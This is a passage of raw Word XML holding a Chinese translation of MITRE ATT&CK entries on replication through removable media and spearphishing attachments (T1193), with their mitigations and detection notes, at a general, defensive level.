            <w:r w:rsidRPr="00E34483">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>启用自动执行或者存在允许代码执行的漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3817800F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E34483" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E34483">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="789893AA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E34483" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E34483">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，数据泄漏防护</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1065E742" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00704BCA" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="555555"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E34483">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="418F6AB5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35FD8B54" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E34483" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00E34483">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击者可以通过拷贝恶意软件到移动存储介质然后插入到系统上并利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34483">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>autorun</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34483">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能获得执行权限，从而进入到系统（可能是没有接入到网络的系统）。在横向移动的情况下，可能会通过篡改移动存储介质上的可执行文件或者拷贝恶意文件并重命名为看似合法的文件从而欺骗使用者在隔离的系统上执行。在初始访问的情况下，可能会使用手工操作移动存储介质，或者篡改移动存储介质格式化系统，或者修改固件等方法来实现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD6ECBB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2830"/>
        <w:gridCol w:w="6906"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="005C4554" w14:paraId="1FF10949" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0244AC43" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1F913027" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00E34483" w14:paraId="762C0F4F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CFDFA13" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E34483" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>禁用或删除相关功能或程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="366FB2D3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E34483" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>非必要情况下，禁止启用</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Autorun</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>功能。非业务需要的情况下，在组织规章层面限制或者禁止使用移动存储介质。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00E34483" w14:paraId="298BE3E5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13542E8E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E34483" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制硬件设备安装</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F8AC3F2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E34483" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在特定网络内限制使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>USB</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>设备以及移动存储介质。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76B29EE1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D862403" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控移动存储介质上的文件访问。检测移动设备插入后从移动设备上执行启动的进程。在这种情况下如果使用远程访问工具来横向移动，那么会发生一系列后续动作，如打开连接到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（命令与控制）的网络连接，或者嗅探系统和网络。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E204DBF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>鱼叉式</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>钓鱼</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41F0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>附件</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="15D4A69E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18537D3E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E34483" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E34483">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:t>: T1193</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55F879BB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E34483" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3862DC57" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E34483" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E34483">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:t xml:space="preserve"> Windows, macOS, Linux</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43ABD48A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E34483" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E34483">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，网络抓包，网络入侵检测系统，沙箱，邮件网关，邮件服务器</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3205914B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E34483" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E34483">
              <w:t>CAPE</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:hyperlink r:id="rId22" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00E34483">
                <w:t>CAPEC-163</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="1AA3B7F3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E34483">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34483">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A08BDDD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C687F2E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鱼叉式钓鱼附件是网络钓鱼的一个特定方式。区别于其他鱼叉钓鱼攻击，它使用电子邮件附带恶意软件附件的方法。所有的鱼叉钓鱼攻击都是针对一个具体的个人、公司或者行业的数字化社会工程学攻击手法。</w:t>
      </w:r>
      <w:r w:rsidRPr="00C66395">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常</w:t>
      </w:r>
      <w:r w:rsidRPr="00C66395">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将文件附加到鱼叉式网络钓鱼电子邮件，依靠用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主动</w:t>
      </w:r>
      <w:r w:rsidRPr="00C66395">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行来获得执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00C66395">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE3F4E2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>附件可能有多种文件类型如微软</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系列文件，可执行文件，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PDF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件或者压缩文件。用户打开附件（甚至点击通过了安全确认）后，攻击负载会利用系统漏洞执行或者直接在系统上执行。通常邮件内容会捏造一些合理的理由诱使用户打开附件，甚至告诉用户如何绕过系统的安全保护限制来打开附件。邮件可能还会告诉用户如何解密附件（比如提供</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的密码）从而逃避邮件防护类产品的扫描。攻击者常常会用修改文件后缀名，文件图标等方式使可执行的附件看起来像是文档类文件，或者让利用某种应用程序漏洞的附件看起来像是其他应用程序的文件格式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57364E87" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2524"/>
        <w:gridCol w:w="23"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="005C4554" w14:paraId="47583B03" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="596F755F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="23F69FAB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="005255F8" w14:paraId="1B887723" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2524" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EDCBE67" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005255F8" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005255F8">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>杀毒程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7212" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="158146DE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005255F8" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005255F8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>杀毒程序可以自动隔离可疑文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="005255F8" w14:paraId="08AB5842" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2524" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D4F2DF0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005255F8" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005255F8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络入侵防护（</w:t>
            </w:r>
            <w:r w:rsidRPr="005255F8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IPS</w:t>
            </w:r>
            <w:r w:rsidRPr="005255F8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7212" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="41A2412E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005255F8" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005255F8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IPS</w:t>
            </w:r>
            <w:r w:rsidRPr="005255F8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或者其他用来扫描并移除有害附件的系统都可以用来阻拦此类攻击行为。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="005255F8" w14:paraId="6125646E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2524" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30658796" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005255F8" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005255F8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制附件类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7212" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="420F5464" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005255F8" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005255F8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将默认阻拦不应该由邮件发送的未知或者未使用的附件类型（如</w:t>
            </w:r>
            <w:r w:rsidRPr="005255F8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="005255F8">
              <w:t>scr, .exe, .pif, .cpl</w:t>
            </w:r>
            <w:r w:rsidRPr="005255F8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>等文件）作为最佳实践。某些邮件扫描设备可以打开并分析压缩、加密文件格式，如</w:t>
            </w:r>
            <w:r w:rsidRPr="005255F8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>zip</w:t>
            </w:r>
            <w:r w:rsidRPr="005255F8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="005255F8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>rar</w:t>
            </w:r>
            <w:r w:rsidRPr="005255F8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>等常常被用来藏匿恶意文件的文件格式。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="005255F8" w14:paraId="03A1825F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2524" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="728AC393" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005255F8" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005255F8">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户培训</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7212" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="507DC2A8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005255F8" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005255F8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>培训用户如何识别社会工程学技巧和如何识别钓鱼邮件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66133A18" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008B464F" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:leftChars="0" w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AA8A4C8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C63C04" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
